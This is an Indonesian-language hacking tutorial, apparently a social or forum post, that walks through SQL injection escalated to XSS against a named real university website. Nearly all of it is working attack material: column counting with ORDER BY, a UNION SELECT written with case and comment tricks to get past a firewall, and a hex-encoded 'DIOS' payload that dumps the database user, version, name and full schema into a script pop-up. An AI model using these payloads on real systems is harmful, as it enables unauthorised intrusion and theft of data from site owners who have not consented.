Halo gaseh
Saia akan memberikan
Materi sql to xss
Langsung aja yaa beb ke target nya😘
http://poliven.ac.id/detail-kegiatan-mhs.php?id=10005
Seperti biasa ya beb kasi string ' 😘
Lanjut aja ke +order+by+1--+-
http://poliven.ac.id/detail-kegiatan-mhs.php?id=10005%27+order+by+1--+-
Cari sampe error beb🥰
Error nya di angka 8
Berarti gasken +union+select+1,2,3,4,5,6,7--+-
Berhubung web nya forbiden
Bepas aja ya sayang🥰
http://poliven.ac.id/detail-kegiatan-mhs.php?id=10005%27and%200%20UniOn+distinct+SeLEct+1,2,null,null,null,null,7%23
Gas masukin dios beb
Dios=
concat(0x3C7363726970743E70726F6D70742827415A4B4147414E535C6E55736572203A3A20,user(),0x5c6e76657273696f6e203a3a20,version(),0x5c6e4461746162617365203a3a20,database(),0x5c6e,(select(group_concat(table_name,0x203a3a20,column_name,0x5c6e))from(/*!50000information_schema./**8**/columns*/)),0x5c6e5c6e,0x272c27,@@ft_boolean_syntax,0x27293c2f7363726970743e)
Hasil?
http://poliven.ac.id/detail-kegiatan-mhs.php?id=10005%27and%200%20UniOn+distinct+SeLEct+1,2,null,null,null,null,concat(0x3C7363726970743E70726F6D70742827415A4B4147414E535C6E55736572203A3A20,user(),0x5c6e76657273696f6e203a3a20,version(),0x5c6e4461746162617365203a3a20,database(),0x5c6e,(select(group_concat(table_name,0x203a3a20,column_name,0x5c6e))from(/*!50000information_schema./**8**/columns*/)),0x5c6e5c6e,0x272c27,@@ft_boolean_syntax,0x27293c2f7363726970743e)%23
Nah berhasil
Smoga bermanfaat kawan